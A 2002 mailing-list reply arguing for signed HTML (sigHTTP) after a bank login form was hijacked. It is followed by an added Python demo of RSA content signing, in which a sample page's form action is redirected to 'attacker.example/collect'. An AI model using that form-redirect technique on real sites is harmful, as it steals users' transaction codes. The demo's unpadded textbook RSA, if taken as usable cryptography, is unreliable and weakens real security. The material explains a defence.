Re: sigHTTP comments?

Hi John,

On Friday, 21 June 2002, at 17:00, John Stracke wrote:

>> And at least I think you are too pessimistic about the small number of
>> interested people. I have the impression that here in Germany there are
>> still lots of people concerned and frightened every time some TV magazine
>> reports online banking bugs here and security frauds there. If everyone is
>> complaining, how about solving it in a simple way?
>
> But this doesn't solve the actual problem--nearly all cracks of online
> banks, stores, etc., are *not* done by intercepting HTTP traffic.
> They're usually done by exploiting security bugs in the server
> software and stealing information out of the databases.  sigHTTP would
> do nothing about that; in fact, it might exacerbate the problem, by
> diverting resources that could instead be spent on securing the
> server.

Here we have already had one case where an intruder silently changed the 
HTML code of a banking portal.
He changed the login form in such a way that the one-time transaction 
code of the money transfer was sent to him, and he displayed a successful 
result himself from the hijacked web server. The SSL certificate was of 
no use in this case; it even gave the user false confidence.

SigHTTP would have been a solution for this case. Changing already 
signed HTML content would have deleted or modified the signature, and a 
SigHTTP-capable browser or third-party tool would have been given the 
chance to alert the user.

The "best thing", for sure, is a perfectly hardened server, but I think 
there must be a second layer of security.

--
Think Safety
www.security-gui.de & www.sighttp.org
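The detection the post describes, as an added example that is not part of the original message and not the sigHTTP specification: the bank signs the exact bytes of its login page with a private key held off the web server, and a client-side tool holding the public key re-checks the delivered page. The attacker's edit to the form invalidates the signature even though the server's TLS certificate is untouched. The signature scheme is textbook RSA over a SHA-256 digest written against the Python standard library only, so it runs offline; the HTML pages and the host `attacker.example` are constructed sample input, and the function names are this example's own.

```python
"""Added example, not part of the original post and not the sigHTTP
specification: a detached public-key signature over an HTML page,
verified on the client side, so that a login form rewritten on a
compromised web server fails verification.  The scheme is textbook RSA
over a SHA-256 digest, standard library only, so the example runs
offline; a real deployment would use a vetted library with a padding
scheme such as RSASSA-PSS.  Pages and the host "attacker.example" are
constructed sample input."""
import hashlib
import secrets

# ---- minimal RSA (illustration only: no padding, short key) -----------

def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin test; enough for a demonstration key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits: int = 1024):
    """Return ((n, e), (n, d)).  The private key stays with the publisher,
    never on the web server that is the attack surface in the post."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            break
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), (n, pow(e, -1, phi))


# ---- content signing and verification ---------------------------------

def _digest(html: bytes) -> int:
    # The exact delivered bytes are signed; any change alters this value.
    return int.from_bytes(hashlib.sha256(html).digest(), "big")


def sign_html(html: bytes, private_key) -> str:
    """Publisher side: detached, hex-encoded signature (e.g. for a
    response header or sidecar file)."""
    n, d = private_key
    return format(pow(_digest(html), d, n), "x")


def verify_html(html: bytes, signature_hex: str, public_key) -> bool:
    """Client side (browser or third-party tool holding the bank's public
    key): True only if the page is byte-for-byte what was signed."""
    n, e = public_key
    try:
        sig = int(signature_hex, 16)
    except ValueError:
        return False
    if not 0 < sig < n:
        return False
    return pow(sig, e, n) == _digest(html)


# Constructed sample: the bank's genuine login form ...
ORIGINAL_PAGE = b"""<html><body>
<form method="post" action="/transfer">
  <input name="account"><input name="amount">
  <input name="tan" type="password">
  <input type="submit" value="Transfer">
</form></body></html>
"""

# ... and the same page after an intruder on the web server pointed the
# form at his own host, so the one-time transaction code (TAN) goes to
# him.  The visible page and the server's TLS certificate are unchanged.
TAMPERED_PAGE = ORIGINAL_PAGE.replace(
    b'action="/transfer"', b'action="https://attacker.example/collect"')


def demo():
    """Sign the genuine page offline, then check what the client would
    accept.  Returns (genuine_verifies, tampered_verifies)."""
    public_key, private_key = generate_keypair()
    sig = sign_html(ORIGINAL_PAGE, private_key)
    return (verify_html(ORIGINAL_PAGE, sig, public_key),
            verify_html(TAMPERED_PAGE, sig, public_key))


if __name__ == "__main__":
    genuine, tampered = demo()
    print("genuine page verifies:", genuine)    # True
    print("tampered page verifies:", tampered)  # False
```

Three points a practitioner would check before relying on this as the "second layer": the signing key must never be on the server that can be hijacked, otherwise the intruder simply re-signs his modified form; the client must refuse an unsigned page from a site it knows to be signed, otherwise the attacker strips the signature instead of forging it; and the signed bytes must be exactly what the client sees, so compression, templating and per-user rendering have to happen before signing or be undone by the client before verifying.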

